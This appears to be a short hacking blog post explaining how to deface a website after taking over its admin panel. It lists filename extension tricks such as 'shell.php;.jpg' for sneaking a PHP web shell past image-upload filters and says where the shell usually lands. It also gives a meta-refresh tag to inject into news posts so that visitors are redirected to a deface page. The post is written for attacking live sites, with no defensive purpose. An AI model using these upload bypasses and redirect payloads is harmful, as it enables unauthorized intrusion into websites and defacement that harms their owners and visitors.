After hacking the admin panel of the website, find a place to upload image. from there instead of image you can upload your shell. Sometimes .php files are not allowed or there are restrictions on uploading .php files, So inorder to upload and execute for shell you have to change the extension of your shell.
Open your shell in notepad and then Save As and change the extension to any any one of the
shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;
Suppose you have uploaded your shell in image section of the website, You will find your shell most of times here http://website/images/shell.php
If there is no upload section in the administrator panel of the website but there is a section where you can update or add news, you can use meta http-equiv to make redirection from website to your deface page.
Just add this code in news
<meta http-equiv="refresh" content="0;url=http://link_to_your_deface_page">
0 comments:
Post a Comment